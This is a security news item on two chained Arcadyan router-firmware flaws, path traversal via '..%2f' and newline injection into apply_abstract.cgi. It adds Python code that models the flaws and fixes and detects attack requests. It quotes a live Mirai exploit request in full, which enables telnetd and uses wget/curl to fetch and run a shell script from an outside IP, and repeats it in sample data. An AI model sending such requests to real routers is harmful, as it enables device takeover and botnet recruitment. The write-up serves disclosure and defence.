Vulnerability in home routers from 17 manufacturers

A large-scale attack has been observed against home routers whose firmware uses the HTTP server implementation from Arcadyan. To take control of a device, the attackers chain two vulnerabilities that together allow remote execution of arbitrary code with root privileges. The problem affects a fairly wide range of ADSL routers from Arcadyan, ASUS and Buffalo, as well as devices sold under the brands of telecom operators such as Beeline (confirmed on the Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon and Vodafone. The flaw has been present in Arcadyan firmware for more than 10 years, and in that time it has spread to at least 20 device models from 17 different manufacturers.

The first vulnerability, CVE-2021-20090, allows any script of the web interface to be reached without authentication. Some directories from which images, CSS files and JavaScript are served are deliberately accessible without a session, and the check for whether a request falls into one of those directories is a simple prefix match on the request path. A literal "../" in the path is blocked by the firmware, but the combination "..%2f" (the slash percent-encoded) passes the check and is only decoded afterwards, when the file is looked up. As a result, a protected page can be opened with a request such as "http://192.168.1.1/images/..%2findex.htm".
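The flawed check and its fix, modelled in Python as an added example (this is not Arcadyan's code, which is not reproduced here). The vulnerable function compares the still-encoded path against an allow-list, while the file layer decodes and canonicalises afterwards; the hardened function canonicalises first, with the same routine the file layer uses, so the decision and the file access see the same string. The allow-listed prefixes and all function names are assumptions; the example also covers the "%2e%2e" spelling of the dot segments, which the article does not mention.

```python
import posixpath
from urllib.parse import unquote

# Directories served without a session. The article names images, CSS and
# JavaScript; the exact prefixes used by the firmware are an assumption.
PUBLIC_PREFIXES = ("/images/", "/css/", "/js/")


def is_public_vulnerable(raw_path: str) -> bool:
    """Models the flawed check: a literal '../' is refused, then the still
    percent-encoded request path is compared to the allow-list by prefix."""
    if "../" in raw_path:
        return False
    return raw_path.startswith(PUBLIC_PREFIXES)


def resolve(raw_path: str) -> str:
    """What the file-serving code opens afterwards: it percent-decodes the
    path and collapses '..' segments, i.e. it canonicalises AFTER the
    authorisation decision was taken on the raw string."""
    return posixpath.normpath(unquote(raw_path))


def is_public_fixed(raw_path: str) -> bool:
    """Hardened check: decode and canonicalise FIRST (same routine as resolve),
    refuse control characters, then compare the canonical path to the list."""
    decoded = unquote(raw_path)
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in decoded):
        return False
    canon = posixpath.normpath(decoded)
    if not canon.startswith("/") or canon.startswith("//"):
        return False
    return canon.startswith(PUBLIC_PREFIXES)


def decide(raw_path: str) -> dict:
    """Runs one request path through both checks and reports which file the
    server would actually serve if the request were let through."""
    return {
        "vulnerable_allows": is_public_vulnerable(raw_path),
        "fixed_allows": is_public_fixed(raw_path),
        "served_file": resolve(raw_path),
    }


if __name__ == "__main__":
    for p in ("/images/logo.png", "/images/../index.htm",
              "/images/..%2findex.htm", "/images/..%2fapply_abstract.cgi",
              "/images/%2e%2e/index.htm", "/images/sub/../logo.png"):
        print(p, decide(p))
```

Note that the hardened check is not merely stricter: "/images/sub/../logo.png" is refused by the original logic (literal "../") but correctly accepted after canonicalisation, because it resolves to a file inside the public directory.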

The second vulnerability, CVE-2021-20091, allows an authenticated user to change the device's system settings by sending specially crafted parameters to the apply_abstract.cgi script, which does not check the parameters for newline characters. For example, when requesting a ping, an attacker can supply the value "192.168.1.2%0AARC_SYS_TelnetdEnable=1" in the field that holds the IP address to be pinged. When the script generates the settings file /tmp/etc/config/.glbcfg, the decoded newline ends the ping-address line and the script writes "ARC_SYS_TelnetdEnable=1" as a separate line, which enables the telnetd server and with it unrestricted root shell access. In the same way, setting the ARC_SYS_ parameter allows arbitrary commands to be executed on the system. The first vulnerability makes it possible to reach the problematic script without authentication, by requesting it as "/images/..%2fapply_abstract.cgi".
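A model of the settings-file write and of its fix, added here as an example (not the firmware's own code). The vulnerable writer copies each submitted field into a KEY=VALUE line exactly as the text describes, so a decoded %0A in the value starts a new line that is read back as a new setting; the hardened writer restricts key names, rejects control characters in values and requires the ping target to be an IP literal. The file is returned as a string instead of being written to /tmp/etc/config/.glbcfg, the request bodies are constructed from the article's example, and the set of fields the real CGI persists is an assumption.

```python
import ipaddress
import re
from urllib.parse import unquote_plus

# Constructed request bodies. The first one carries the article's crafted ping
# address: a %0A followed by a second setting.
CRAFTED_PING_BODY = (
    "action=start_ping&ARC_ping_ipaddress=192.168.1.2%0AARC_SYS_TelnetdEnable=1"
)
BENIGN_PING_BODY = "action=start_ping&ARC_ping_ipaddress=192.168.1.2"

# Key names are an assumption: only this shape is allowed by the fixed writer.
KEY_RE = re.compile(r"[A-Za-z0-9_]{1,64}")


def parse_form(body: str) -> list:
    """Minimal application/x-www-form-urlencoded parser: split on '&', then on
    the FIRST '=' so that an '=' inside a value stays part of the value."""
    pairs = []
    for field in body.split("&"):
        if not field:
            continue
        key, _, value = field.partition("=")
        pairs.append((unquote_plus(key), unquote_plus(value)))
    return pairs


def build_glbcfg_vulnerable(body: str) -> str:
    """Models the flawed apply_abstract.cgi: every submitted field except the
    action selector is written verbatim as one KEY=VALUE line. Nothing inspects
    the value, so a decoded newline ends the line and whatever follows it is
    stored as a setting of its own."""
    return "".join(f"{k}={v}\n" for k, v in parse_form(body) if k != "action")


def build_glbcfg_fixed(body: str) -> str:
    """Hardened writer: strict key pattern, no control characters in values,
    and the ping target must parse as an IP address. Raises ValueError."""
    out = []
    for k, v in parse_form(body):
        if k == "action":
            continue
        if not KEY_RE.fullmatch(k):
            raise ValueError(f"rejected key {k!r}")
        if any(ord(c) < 0x20 or ord(c) == 0x7F for c in v):
            raise ValueError(f"control character in value of {k}")
        if k == "ARC_ping_ipaddress":
            ipaddress.ip_address(v)  # raises ValueError for anything but an IP literal
        out.append(f"{k}={v}\n")
    return "".join(out)


def load_glbcfg(text: str) -> dict:
    """Reads the file back the way a consuming daemon would: one KEY=VALUE per line."""
    cfg = {}
    for line in text.splitlines():
        if "=" in line:
            k, _, v = line.partition("=")
            cfg[k.strip()] = v
    return cfg


def telnetd_enabled(cfg: dict) -> bool:
    return cfg.get("ARC_SYS_TelnetdEnable") == "1"


def apply_ping_request(body: str, hardened: bool) -> dict:
    """Runs one request through the chosen writer and returns the resulting
    settings (an empty dict when the hardened writer rejects the input)."""
    try:
        text = build_glbcfg_fixed(body) if hardened else build_glbcfg_vulnerable(body)
    except ValueError:
        return {}
    return load_glbcfg(text)


if __name__ == "__main__":
    for hardened in (False, True):
        cfg = apply_ping_request(CRAFTED_PING_BODY, hardened)
        print("hardened" if hardened else "vulnerable", cfg, "telnetd:", telnetd_enabled(cfg))
```

The value check is the essential part: a newline-separated file format makes every writer a potential injection point, so the writer, not the reader, has to guarantee that a value cannot contain the line terminator.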

To exploit the vulnerabilities, an attacker only needs to be able to send requests to the port on which the web interface listens. Judging by how quickly the attack has spread, many operators leave the interface reachable from the external network to make it easier for support staff to diagnose problems. Even where access is restricted to the internal network, the attack can still be carried out from outside through the browser of a user on that network, using the DNS rebinding technique. The vulnerabilities are already being actively exploited to enlist routers into the Mirai botnet; a captured request looks like this:

POST /images/..%2fapply_abstract.cgi HTTP/1.1
Connection: close
User-Agent: Dark

action=start_ping&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7%0A ARC_SYS_TelnetdEnable=1&%0AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://212.192.241.72/lolol.sh; chmod+777+lolol.sh; sh+lolol.sh&ARC_ping_status=0&TMP_Ping_Type=4

The request combines both flaws: the path reaches apply_abstract.cgi without a session, the newline in the ping address enables telnetd, and a second injected ARC_SYS_ line downloads and runs the bot's installer script.
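An added example, not from the article or its source: a small triage routine that applies the two indicators above to request records (a ".." segment reached through an unauthenticated directory, and a newline or an ARC_SYS_ key in an apply_abstract.cgi body), plus the usual Host-header guard that closes the DNS rebinding route, since a rebound browser still sends the attacker's domain in Host. The sample records are constructed; the third body is the Mirai request quoted above, trimmed. The public directory prefixes and the device's own host names are assumptions.

```python
import re
from urllib.parse import unquote, unquote_plus

PUBLIC_PREFIXES = ("/images/", "/css/", "/js/")   # assumed unauthenticated directories
DEVICE_HOSTS = {"192.168.1.1", "router.local"}     # assumed own names/addresses of the device
TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")

# Constructed access-log-style records (method, path, body). The third body is
# the Mirai request from the article, trimmed; the others are made up here.
SAMPLE_REQUESTS = [
    ("GET", "/images/logo.png", ""),
    ("GET", "/images/..%2findex.htm", ""),
    ("POST", "/images/..%2fapply_abstract.cgi",
     "action=start_ping&submit_button=ping.html&ARC_ping_ipaddress=212.192.241.7%0A"
     "ARC_SYS_TelnetdEnable=1&%0AARC_SYS_=cd+/tmp;wget+http://212.192.241.72/lolol.sh;"
     "sh+lolol.sh&ARC_ping_status=0&TMP_Ping_Type=4"),
    ("POST", "/apply_abstract.cgi", "action=start_ping&ARC_ping_ipaddress=8.8.8.8"),
]


def decode_path(path: str, rounds: int = 3) -> str:
    """Percent-decodes repeatedly so that ..%2f and a double-encoded ..%252f
    both become '../' before the traversal pattern is applied."""
    for _ in range(rounds):
        dec = unquote(path)
        if dec == path:
            break
        path = dec
    return path


def classify_request(method: str, path: str, body: str) -> list:
    """Returns the names of the indicators that fire for one request."""
    hits = []
    dec = decode_path(path)
    if dec.startswith(PUBLIC_PREFIXES) and TRAVERSAL.search(dec):
        hits.append("traversal-via-public-dir")          # CVE-2021-20090 pattern
    if method == "POST" and dec.split("/")[-1] == "apply_abstract.cgi":
        fields = [unquote_plus(f) for f in body.split("&")]
        if any("\n" in f or "\r" in f for f in fields):
            hits.append("newline-in-form-field")          # CVE-2021-20091 pattern
        lines = [ln for f in fields for ln in f.splitlines()]
        if any(ln.lstrip().startswith("ARC_SYS_") for ln in lines):
            hits.append("arc_sys-key-from-client")        # the ping form never sets ARC_SYS_*
    return hits


def scan(records: list) -> list:
    """(index, indicators) for every record that triggers at least one indicator."""
    flagged = []
    for i, (method, path, body) in enumerate(records):
        hits = classify_request(method, path, body)
        if hits:
            flagged.append((i, hits))
    return flagged


def host_header_allowed(host: str) -> bool:
    """DNS rebinding guard for the interface itself: accept a request only if the
    Host header (minus an optional port) names the device's own address."""
    name = re.sub(r":\d+$", "", host.strip().lower())
    return name in DEVICE_HOSTS


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_REQUESTS):
        print(idx, SAMPLE_REQUESTS[idx][1], hits)
    print(host_header_allowed("192.168.1.1:80"), host_header_allowed("attacker.example"))
```

Decoding the path before matching matters: a rule that looks for the literal string "..%2f" misses "%2E%2E%2F" and double-encoded variants, whereas matching the decoded form catches all spellings that the server would itself resolve.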

Source: opennet.ru
